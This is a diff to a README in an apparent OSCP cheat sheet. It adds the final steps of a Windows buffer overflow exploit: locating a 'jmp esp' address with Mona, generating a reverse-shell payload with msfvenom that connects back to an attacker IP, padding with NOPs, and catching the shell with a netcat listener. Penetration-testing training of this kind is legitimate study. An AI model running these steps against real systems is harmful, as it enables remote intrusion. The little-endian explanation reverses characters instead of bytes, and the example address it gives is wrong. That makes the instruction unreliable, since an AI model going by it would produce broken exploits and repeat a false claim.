pharo-sec/OSCP-Cheat-Sheet/Buffer Overflow/README.md

 Note: Keep a file of these bad characters, you will need them to find the jump point.

 ## Find the Jump Point

+While the application is crashed or running run the following Mona command in Immunity Debugger with the list of bad caracters found in the previous steps

+<code>!mona jmp -r esp -cpb "\x00\xXX\xXX"</code>

+This should bring up a window that will have several addresses to several "jmp esp" memory locations.

+Pick an address and update the retn variable in the exploit.py file.

+Note: Keep in mind the architecture of the host.
+If the host is running in little endian, then the address needs to be written backwards (i.e. if the address is 123456 then the little endian address would be 654321).
+Convert the address to HEX by adding a "\x" before every two characters (i.e. if the address is 123456 then the HEX version would be \x12\x34\x56).
+If we are running in little endian then the final address would be "\x65\x43\x21".

+## Generate the Payload

+Use <code>msfvenom</code> to generate shellcode.

+<code>msfvenom -p windows/shell_reverse_tcp LHOST=[YOUR_IP] LPORT=443 EXITFUNC=thread -b "[BAD_CHARACTERS]" -f py</code>

+Copy the output to the payload variable in the exploit.py file

+Note: The msfvenom command outputs the shellcode under the name buf = "...", make sure to change the name to payload before executing the script.

+Add some space to allow the shellcode to unpack by setting the padding variable to:

+<code>padding = "\x90" * 16</code>

+## Exploit

+Setup a netcat listener

+<code>nc -lnvp 443</code>

+Restart the application and run exploit.py, and we should catch a shell.